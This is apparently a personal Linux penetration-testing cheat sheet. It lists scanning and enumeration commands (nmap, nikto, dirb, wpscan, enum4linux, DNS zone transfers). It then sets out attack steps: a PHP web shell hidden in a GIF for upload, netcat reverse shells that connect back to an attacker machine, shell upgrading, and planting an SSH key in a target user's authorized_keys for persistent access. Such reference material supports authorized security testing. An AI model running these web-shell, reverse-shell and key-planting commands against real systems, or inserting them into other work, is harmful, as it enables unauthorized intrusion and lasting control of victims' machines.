WIP – Linux pentest cheatsheet

Intended for personal use. I use many websites and pages from my blog; I just want to have all those things on one cozy page.

Enumeration

Port

nmap

Simple, quick and dirty, with OS and version detection:

[code]nmap -A -O -v -T4 X.X.X.X[/code]

A more complete one :

[code]nmap -sV -sC -oA tcpnmap X.X.X.X[/code]

Custom one to see if there are some unusual ports open:

[code]nmap -A -O -v -T4 --top-ports 5000 -oA tcptop5000nmap X.X.X.X[/code]

UDP :

[code]nmap -sU -oA udpnmap X.X.X.X[/code]

P.S. add -p- to scan all ports (take a break and go make a sandwich)

Webservice

Nikto

[code]nikto -h X.X.X.X[/code]

Uniscan

[code]uniscan -u http://X.X.X.X/ -qweds[/code]

Dirbuster

Start the GUI:

[code]dirbuster[/code]

Most used wordlist:

[code]/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt[/code]

Dirb

[code]dirb http://X.X.X.X /usr/share/dirb/wordlists/common.txt[/code]

(also big.txt is interesting)

Dirsearch

[code]git clone http://github.com/maurosoria/dirsearch
python3 dirsearch.py -u http://X.X.X.X -e php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f -t 20[/code]

-f force extensions
-r recursive (if needed)

Wpscan

[code]wpscan --url http://X.X.X.X/wordpress --enumerate u,vp,vt[/code]

droopescan

Up to date drupal scanner
[code]droopescan scan drupal -u X.X.X.X[/code]

Burp

Enum4linux

For extensive enumeration with enum4linux:
[code]enum4linux -a -o -n -v X.X.X.X[/code]

DNS

NSLOOKUP

[code]nslookup
>SERVER X.X.X.X
>127.0.0.1
Server: …
Address: …
>X.X.X.X
Server: …
Address: …
>box.com
Server: …
Address: …

Name: box.com
Address:X.X.X.X[/code]

dnsrecon

Reverse lookup brute force:

[code]dnsrecon -r 127.0.0.0/24 -n X.X.X.X[/code]

[code]dnsrecon -r 127.0.1.0/24 -n X.X.X.X[/code]

[code]dnsrecon -r X.X.X.0/24 -n X.X.X.X[/code]

dns zone transfer

Zone transfer:

[code]dig axfr @X.X.X.X[/code]

A zone transfer can reveal a few extra subdomains and records:

[code]dig axfr [email protected][/code]

add a dns server

edit /etc/resolv.conf and add:

[code]nameserver X.X.X.X[/code]

Reverse Shell

To test

GIF to upload for the test:
[code]GIF8 <?php echo system($_REQUEST['command']); ?>[/code]
[code]xxxx.gif?command=id[/code]
If it works:
[code]xxxx.gif?command=nc -e /bin/sh KALIIP 8081[/code]

netcat

TCP

On kali box : nc -lvnp 8081
[code]nc -e /bin/sh KALIIP 8081[/code]

UDP

**(need to check -e -u)**
On kali box : nc -u -lvnp 8081
[code]nc -u -e /bin/sh KALIIP 8081[/code]

To have full shell :
[code]python -c 'import pty;pty.spawn("/bin/bash");'[/code]
Background with CTRL+Z
[code]stty raw -echo
fg [enter][/code]
(sometimes you need to type the command bash afterwards)

Create ssh keyset

[code]ssh-keygen -f /root/ssh_key[/code]
(or answer the path prompt with /root/ssh_key)
and the generated public key (ssh_key.pub) needs to be appended to the target user's
[code]/home/user/.ssh/authorized_keys[/code]
to connect:
[code]ssh -i ssh_key user@X.X.X.X[/code]

Useful links:

Reverse Shell Cheat Sheet

Privilege Escalation

LinEnum.sh

linuxprivchecker.py

unixprivesc.sh

sudo info

to see which commands the user can run with sudo:
[code]sudo -l[/code]
to see the installed version of sudo:
[code]dpkg -l sudo[/code]

Read an exploit directly from searchsploit (-x examines it, -m copies it to the current directory):
[code]searchsploit -x <path from the search results>[/code]
